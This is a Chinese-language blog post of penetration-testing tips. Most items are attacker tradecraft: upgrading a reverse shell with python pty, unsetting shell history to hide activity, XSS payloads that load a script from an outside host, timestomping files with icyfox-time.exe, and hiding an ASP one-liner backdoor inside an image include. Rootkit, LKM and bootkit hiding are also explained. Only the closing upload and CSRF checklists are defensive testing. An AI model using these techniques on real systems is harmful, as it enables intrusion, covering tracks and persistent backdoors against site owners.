滲透測試筆記七
滲透測試筆記主要為一些短小但又精華的滲透小技巧,旨在與小伙伴們分享學習心得。為保證質量,每一篇為20條左右的滲透小記。
1.提權后進入遠程桌面發(fā)現(xiàn) desktop locker(桌面鎖)
解決方法:
ctrl+shift+esc 一直按會出現(xiàn)資源管理器,鼠標結束desktop locker即可
2.3389低權限用戶提權(這個情況似乎比較少見?)的時候或者日常滲透用軟件的時候可以
subst x: D:\XXX 用命令創(chuàng)建 X盤符 遠程桌面連接器-本地資源-詳細信息 -驅動器-勾選新增的X盤符
可以把本地驅動器映射到遠程3389服務器上的X盤,放上常用提權工具方便滲透。
3.Rootkits:
Rootkits是linux/unix獲取root權限之后使得攻擊者可以隱藏自己的蹤跡和保留root訪問權限的神器,通常攻擊者使用 rootkit的檢查系統(tǒng)查看是否有其他的用戶登錄,如果只有自己,攻擊者就開始著手清理日志中的有關信息,通過rootkit的嗅探器還可以獲得其他系統(tǒng)的用戶和密碼!
目前常用的有:t0rn /mafix/enyelkm 等等。
Rootkits通常分為:應用級別—內核級別—-硬件級別,早期的是rootkit主要為應用級rootkit通過替換login、ps、ls、 netstat等系統(tǒng)工具或修改.rhosts等系統(tǒng)配置文件等實現(xiàn)隱藏后門,硬件級RootKits主要是指Bios Rootkits,能夠在系統(tǒng)加載前獲得控制權,通過向磁盤中寫入文件,再由引導程序加載該文件重新獲得控制權也可以采用虛擬機技術,使整個操作系統(tǒng)運行在rootkit掌握之中,目前常見的rootkit是內核級rootkit,通過直接修改內核來添加隱藏代碼實現(xiàn)控制系統(tǒng)的功能。
最為簡單實用的應用級別Rootkit是通過將添加過提權代碼的命令替換系統(tǒng)中原始的命令來實現(xiàn)功能的,并且一般提供清理工具刪除wtmp、 utmp、lastlog等日志文件中自己的行蹤,并且復雜點的rootkit還可以向攻擊者提供telnel、shell和finger等服務。
4.LKM隱藏技術:
LKM就是可裝載內核模塊(Loadable Kernel Modules)。這些模塊本來是Linux系統(tǒng)用于擴展其功能的。
木馬最大的特性就是隱蔽性,不能輕易讓人察覺,所以隱藏木馬相關信息是關鍵的因素。對于Linux操作系統(tǒng)來說,主要有靜態(tài)隱藏和動態(tài)隱藏兩個標準。
由于Linux本身的安全性,想利用外殼程序隱藏木馬文件和進程不可能實現(xiàn),所以就借要通過修改Linux內核的系統(tǒng)調用來隱藏木馬相關信息,這就是LKM技術。
5.Bootkit:Bootkit是更高級的Rootkit,該概念最早于2005年被eEye Digital公司在他們的“BootRoot”項目中提及。它主要利用其內核準入和開機過程的隱身技術,當在功能上并無異于Rootkit。他們的不同主要表現(xiàn)在獲取準入的方式上。傳統(tǒng)的rootkit利用系統(tǒng)啟動時提升權限。而Bootkit是被安置在外設的主引導扇區(qū)和駐留在整個系統(tǒng)的啟動過程。
Bootkit的引導扇區(qū)代碼總是在ROM BIOS執(zhí)行后主引導記錄被載入前劫持系統(tǒng)啟動程序。一旦被載入到內存,代碼便執(zhí)行中斷指令,也就是俗稱的HOOK掛鉤。它掛接到INT 13指示后續(xù)扇區(qū)讀取其信息。這個過程完成后,Bootkit試圖改變引導過程的結構和操作邏輯流程。
6.用nst的反彈后門連上nc后不能su交互,報錯如下:
standard in must be a tty
解決方法:
python -c ’import pty; pty.spawn(“/bin/sh”)’
得到shell就可以su進行交互了。
7.history不記錄:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
8、自己嘗試最短的引入外部腳本的xss payload(28個字符):
<script src=http://e1v.cn/pj
9、有文章稱
<script src=//xxx.xxx/a.js></script>
也可以插入,但是實測證明,不是每個瀏覽器都支持沒有http:的插入。要有效可靠的插入,還是參考上一條的插入方法。
10、實在要短得不行的,那就分開來插吧:
<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>
11、C類IP地址:C類數(shù)字相同的IP地址,通常是同一臺服務器或是處于同一網(wǎng)絡上的服務器。所以如果兩個網(wǎng)站IP地址前三個數(shù)字相同,如198.197.196.195和198.197.196.194,搜索引擎會認為這兩個網(wǎng)站之間是有一定關系的,很可能在同一架服務器上。
12、URL靜態(tài)化:通過URL重寫技術,將動態(tài)URL轉化為靜態(tài)URL。在LAMP主機上,URL重寫通常是通過mod_rewrite模塊;在windows主機上,通常是通過ISAPI Rewrite或是 IIS Rewrite模塊。
13、在nmap目錄下有很多掃描腳本,可以實現(xiàn)很多智能化的功能,具體在/nmap/scripts這個目錄下:使用方法:
nmap -P0 --script= smb-check-vulns 192.168.XXX.XX
14、常用的nmap掃描類型參數(shù)主要有:
-sT TCP connect掃描
-sS TCP SYN掃描
-sF -sX -sN 通過設置一些特殊的標記位來避開防火墻的檢測
-sP 利用ping來探測主機是否存活
-sU 探測主機開放了哪些UDP端口
-sA TCP ACK掃描
-sV 探測端口上面運行的詳細信息
15、常用的nmap掃描選項有:
-O 探測主機操作系統(tǒng)
-A 比較高級的主機旗標探測
-Pn 不利用ping命令來探測主機是否存活
-F 快速掃描模式
-p<端口范圍>
16、使用icyfox-time.exe修改文件的時間屬性:
icyfox-time.exe "e:\web\yuan.asp" e:\web\gai.asp
注意:第一個文件路徑需要用雙引號,第二個不需要。這樣就把”e:\web\gai.asp”這個文件的時間改為和”e:\web\yuan.asp”文件一樣啦。
17、更加隱蔽的asp網(wǎng)站留后門的方法:
上傳一只一句話圖片馬,具體制作方法請參見“圖種技術”;然后在你要插入一句話的頁面里插入一下代碼語句:
<!--#include file="圖片馬路徑"-->
18、關于上傳漏洞的檢測步驟:
(1).上傳文件是否有格式限制,是否可以上傳exe文件;
(2).上傳文件是否有大小限制,上傳太大的文件是否導致異常錯誤,上傳0K的文件是否會導致異常錯誤,上傳并不存在的文件是否會導致異常錯誤;
(3).通過修改擴展名的方式是否可以繞過格式限制,是否可以通過壓包方式繞過格式限制;
(4).是否有上傳空間的限制,是否可以超過空間所限制的大小,如將超過空間的大文件拆分上傳是否會出現(xiàn)異常錯誤。
(5).上傳文件大小大于本地剩余空間大小,是否會出現(xiàn)異常錯誤。
(6).關于上傳是否成功的判斷。上傳過程中,中斷。程序是否判斷上傳是否成功。
(7).對于文件名中帶有中文字符,特殊字符等的文件上傳。
19、跨站請求偽造(CSRF)
(1).同個瀏覽器打開兩個頁面,一個頁面權限失效后,另一個頁面是否可操作成功。
(2).當頁面沒有驗證碼時,查看頁面源代碼,查是是否有token。如果頁面完全是展示頁面,是不會有token的。
